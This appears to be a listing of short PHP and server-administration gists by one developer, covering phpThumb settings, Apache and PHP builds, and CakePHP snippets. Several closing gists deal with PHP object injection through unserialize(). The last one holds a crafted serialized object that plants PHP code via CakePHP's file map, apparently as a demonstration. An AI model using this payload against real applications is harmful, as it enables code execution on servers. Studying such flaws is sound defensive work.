ichikaway

外部画像のサムネイル禁止、画像サイズ上限設定
phpThumb.config.php

<?php
$PHPTHUMB_CONFIG['cache_maxsize'] = 1024 * 1024 * 1024;　//キャッシュ画像全体の上限容量 1Gbyte

$PHPTHUMB_CONFIG['output_maxwidth']  = 1000;
$PHPTHUMB_CONFIG['output_maxheight'] = 1000;

$PHPTHUMB_CONFIG['nohotlink_enabled']           = true;  //外部画像のサムネイル禁止

ichikaway

Reference: http://mail-archives.apache.org/mod_mbox/httpd-announce/201108.mbox/raw/%[email protected]%3E/

cd apache_source_code/modules/metadata

apxs -c mod_headers.c

apxs -ian headers mod_headers.la

ichikaway

$this->logQuery("db.{$Model->useTable}.update( :conditions :fields, :params )",
array('conditions' => $conditions, 'fields' => $fields, 'params' => array("multiple" => true))

ichikaway

<?php
// https://github.com/basuke/kiosk


//いつものｗ
function pr($data) {
  echo "<pre>";
  print_r($data);
  echo "</pre>";

ichikaway

# wget ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Server/en/os/SRPMS/pcre-6.6-2.el5_1.7.src.rpm
# rpm -ivh pcre-6.6-2.el5_1.7.src.rpm

# vi /usr/src/redhat/SPECS/pcre.spec
  %configure --enable-utf8 --enable-unicode-properties

# rpmbuild -ba /usr/src/redhat/SPECS/pcre.spec
# rpm -Uvh /usr/src/redhat/RPMS/i386/pcre-6.6-2.7.i386.rpm /usr/src/redhat/RPMS/i386/pcre-devel-6.6-2.7.i386.rpm

ichikaway

#!/bin/sh

#put this shellcode on cake vendors directory, then do it.

# origin code from http://cakephp.lighthouseapp.com/projects/42648/phpunit-migration-hints

mkdir -p ~/tmp/cake_phpunit
wget --no-check-certificate https://github.com/sebastianbergmann/phpunit/tarball/3.5.5 -O ~/tmp/cake_phpunit/phpunit.tgz
wget --no-check-certificate https://github.com/sebastianbergmann/phpunit-mock-objects/tarball/1.0.3 -O ~/tmp/cake_phpunit/mock_objects.tgz
wget --no-check-certificate https://github.com/sebastianbergmann/php-code-coverage/tarball/1.0.2 -O ~/tmp/cake_phpunit/code_coverage.tgz

ichikaway

yum install libmcrypt libmcrypt-devel mhash mhash-devel

./configure -prefix=/usr/local/php-5.3.4 --with-apxs2=/usr/local/apache/bin/apxs \
--enable-cli --enable-mbstring --enable-mbregex  \
--with-mysql=/usr/local/mysql/ --enable-zend-multibyte \
--enable-pdo --with-pdo-mysql=/usr/local/mysql \
--with-mysqli=/usr/local/mysql/bin/mysql_config \
--with-curl --with-iconv --enable-sockets \
--with-gd --with-freetype-dir=/usr/lib --with-jpeg-dir=shared \
--with-zlib-dir=shared --enable-gd-native-ttf --enable-gd-jis-conv \

ichikaway

<?php

//private property injection, don't use unserialize() to user input data

class Foo {
  public $var1 = '';
  protected $var2 = '';
  private $var3 = '';

  public function __construct() {

ichikaway

<?php

//private property injection, don't use unserialize() to user input data

class Foo {
  public $var1 = '';
  protected $var2 = '';
  private $var3 = '';

  public function __construct() {

ichikaway

<?php
class SeriController extends AppController {

    var $uses = array();

    function index() {

$userinput_data = 'O:3:"App":4:{s:7:"__cache";i:1;s:5:"__map";a:2:{s:4:"Core";a:1:{s:6:"Router";s:42:"../tmp/cache/persistent/cake_core_file_map";}s:3:"Foo";s:26:"<? echo "hoge"; exit(); ?>";}s:7:"__paths";a:0:{}s:9:"__objects";a:0:{}}';